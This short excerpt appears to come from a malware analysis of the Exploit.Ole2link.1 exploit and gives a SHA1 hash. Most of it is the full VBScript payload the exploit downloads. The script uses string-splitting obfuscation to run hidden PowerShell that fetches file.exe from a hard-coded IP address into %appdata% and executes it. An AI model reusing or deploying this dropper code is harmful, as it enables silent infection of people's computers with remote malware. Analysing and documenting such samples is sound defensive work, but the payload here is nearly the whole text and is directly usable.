SHA1:
- 48f0263d9381e469985d875953156cf5c146f0b2
A downloaded script that Exploit.Ole2link.1 executes on the infected computer:
<html>
<head>
<script language="VBScript">
Set Office = CreateObject( "WScript.Shell" ) :
Dim array3:
array3 = Array("a", "l", "b", "e", "c", "(", "d", "'", "e", "H", "f", "t", "y") :
Dim to_show:
to_show = array3(i+1) + "" + array3(i+3) + "" + array3(i+5) + "" + array3(i+7) + array3(i+9) + array3(i+11):
Dim i:
i = 0:
Office.run "Po"+"w"+"erS"+"he"+"ll -Window"+"Style Hid"+"den (New-Object Sys"+"tem."+"Net."+"Web"+"Client).Do"+"wnl"+"oadFi"+ to_show + "" +"Tp://14"+"4.217.1"+""+"4.173/fil"+"e.exe', '%appdata%\file.exe');",0,true :
Office.run "Po"+"w"+"erS"+"he"+"ll -Window"+"Style Hid"+"den Start-Process -FilePath '%appdata%\file.exe'" :
self.close
</script>
</head>
</html>